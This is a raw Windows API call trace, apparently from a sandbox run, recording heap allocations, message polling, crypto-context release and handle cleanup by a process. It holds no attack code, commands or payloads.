[0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0269.441] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0269.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0269.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0269.441] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0269.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0269.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.442] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0269.442] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0269.442] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0269.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0269.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0269.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0269.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0269.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0269.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0269.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0269.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0269.446] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.446] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f146b0 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51c88 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0269.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0269.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0269.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0269.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0269.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f146b0 | out: hHeap=0x970000) returned 1 [0269.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0269.448] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d18 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0269.448] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.448] FreeLibrary (hLibModule=0x756e0000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0269.448] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0269.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.448] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0269.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51cb8 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bf8 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51be0 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d60 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dd8 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e08 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0269.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0269.449] CloseHandle (hObject=0x2a0) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0269.450] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0269.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0269.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51dd8 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51eb0 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51e50 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51be0 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d60 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0269.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0269.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0269.451] CloseHandle (hObject=0x2d0) returned 1 [0269.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0269.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0269.453] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e68 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c58 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51eb0 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0269.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0269.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0269.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0269.455] HeapFree (in: hHeap=0x970000, 